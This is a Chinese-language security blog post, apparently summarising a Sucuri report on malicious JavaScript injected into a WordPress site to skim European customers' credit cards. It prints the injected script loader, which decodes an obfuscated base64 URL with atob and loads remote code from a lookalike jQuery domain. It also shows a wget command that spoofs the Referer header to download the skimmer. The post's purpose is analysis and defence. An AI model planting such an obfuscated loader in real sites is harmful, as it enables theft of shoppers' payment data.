Sucuri 說他們的客戶遇到一奇怪的訊息,才知道 WordPress 被注入了惡意的 js

而這惡意的 js 利用 atob ,把原本的字串經過 base64 編碼再透過 atob 解析回來成功運作

長這樣子 ↓ (原圖在這裡)

-script>
var img = document.createElement('script');
img.setAttribute('async','');
img.setAttribute('src', window.atob("XXXXXXXXXXXXXXXXXX") + window.location.href + window.atob("JnIyPQ==") + "xxxxxxxxxxxxxxxxxx");
document.head.appendChild(img);
-/script>

它原樣是讓網站載入 ↓

//apiujquery[.]com/ajax/libs/jquery/3.5.1/jquery-3.11.0.min.js?i=

這種情況可以利用 chrome NoScript 來得到(或禁止) 你瀏覽了什麼 javascript (它預設就有一些已驗證可信任的了,其它就自行判斷)

然而 apiujquery.com 是 2021-08-03 才註冊的

IP 是 51.178.8.230,主機是 OVH 的 ,國家在 FR

想瀏覽那支 js ,但是 403 forbidden 的 (記得用測試環境再去瀏覽它)

curl apiujquery.com/ajax/libs/jquery/3.5.1/jquery-3.11.0.min.js
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

不過可以這樣子下載它

wget apiujquery.com/ajax/libs/jquery/3.5.1/jquery-3.11.0.min.js --referer=https://wow.com

惡意 js 主要目的在竊取得信用卡資料,並且對象是歐洲

Related posts 相關文章
挖礦程式利用 WebAssembly 埋在網頁裡挑避檢測
More...
JSshell – 利用 XSS 漏洞遠端控制 shell
More...
用 urlscan.io 來掃網站
More...
Javascript – 滾動螢幕後再讓數字跑 – window scroll and animate
More...

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。